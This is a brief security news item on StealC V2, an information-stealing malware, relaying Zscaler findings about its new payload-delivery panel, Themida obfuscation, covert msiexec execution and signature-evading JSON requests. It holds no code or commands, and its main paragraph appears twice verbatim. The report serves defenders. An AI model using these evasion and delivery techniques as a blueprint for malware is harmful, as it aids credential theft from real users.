Increased payload delivery sophistication and additional stealth have been introduced in the latest version of the StealC information-stealing malware, reports GBHackers News.
Aside from featuring an overhauled control panel enabling the customization of payload delivery for more targeted intrusions, StealC V2 also includes RC4 encryption and server-side brute-forcing and multi-monitor screenshot capturing capabilities, as well as a unified file grabber, while ditching anti-virtual machine checks and third-party DLL downloads from its predecessor, findings from Zscaler showed. Further analysis of the updated StealC payload showed its use of Themida-based obfuscation and a two-stage deobfuscation procedure, as well as the covert running of MSI files via msiexec.exe for more refined payload execution. Improvements were also evident in StealC V2's utilization of JSON requests with unique random parameters for static signature evasion. StealC V2 is also being continuously developed by operators, posing increased challenges in its mitigation, said Zscaler researchers.
Aside from featuring an overhauled control panel enabling the customization of payload delivery for more targeted intrusions, StealC V2 also includes RC4 encryption and server-side brute-forcing and multi-monitor screenshot capturing capabilities, as well as a unified file grabber, while ditching anti-virtual machine checks and third-party DLL downloads from its predecessor, findings from Zscaler showed. Further analysis of the updated StealC payload showed its use of Themida-based obfuscation and a two-stage deobfuscation procedure, as well as the covert running of MSI files via msiexec.exe for more refined payload execution. Improvements were also evident in StealC V2's utilization of JSON requests with unique random parameters for static signature evasion. StealC V2 is also being continuously developed by operators, posing increased challenges in its mitigation, said Zscaler researchers.
